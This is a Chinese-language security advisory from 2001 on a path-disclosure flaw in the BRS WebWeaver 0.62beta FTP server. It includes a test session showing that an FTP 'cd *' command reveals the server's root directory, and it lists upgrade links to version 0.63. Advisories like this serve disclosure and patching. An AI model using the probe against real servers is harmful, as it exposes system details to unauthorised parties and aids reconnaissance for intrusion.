BRS WebWeaver FTP存在路径可发现问题发布时间:2001-05-07 更新时间:2001-05-07 严重程度:中 威胁程度:服务器信息泄露 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 BRS WebWeaver 0.62beta详细描述 BRS WebWeaver是FTP和WEB服务程序,其中FTP中存在一个缺陷 允许远程用户获得FTP ROOT目录的物理地址。通过发送带*号的 CD命令给FTP服务器,就可以通过服务程序返回的信息确定FTP 的ROOT目录。 测试代码 (courtesy joe testa <joetesta@hushmail.com>): >ftp localhost Connected to xxxxxxxxxxxx.rh.rit.edu. 220 BRS WebWeaver FTP Server ready. User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog 331 Password required for jdog. Password: 230 User jdog logged in. ftp> cd * 250 CWD command successful. "/*/" is current directory. ftp> ls 200 Port command successful. 150 Opening data connection for directory list. c:\windows\desktop\*\*.* not found 226 File sent ok ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec. ftp> 解决方案 下载新的程序: BRS WebWeaver 0.62beta: BRS upgrade 0.63 beta WebWeaver063.exe http://members.nbci.com/_XMCM/BSoutham/download/WebWeaver063.exe BRS WebWeaver 0.61beta: BRS upgrade 0.63 beta WebWeaver063.exe http://members.nbci.com/_XMCM/BSoutham/download/WebWeaver063.exe BRS WebWeaver 0.60beta: BRS upgrade 0.63 beta WebWeaver063.exe http://members.nbci.com/_XMCM/BSoutham/download/WebWeaver063.exe BRS WebWeaver 0.52beta: BRS upgrade 0.63 beta WebWeaver063.exe http://members.nbci.com/_XMCM/BSoutham/download/WebWeaver063.exe BRS WebWeaver 0.51beta: BRS upgrade 0.63 beta WebWeaver063.exe http://members.nbci.com/_XMCM/BSoutham/download/WebWeaver063.exe BRS WebWeaver 0.50beta: BRS upgrade 0.63 beta WebWeaver063.exe http://members.nbci.com/_XMCM/BSoutham/download/WebWeaver063.exe BRS WebWeaver 0.49beta: BRS upgrade 0.63 beta WebWeaver063.exe http://members.nbci.com/_XMCM/BSoutham/download/WebWeaver063.exe 相关信息 |
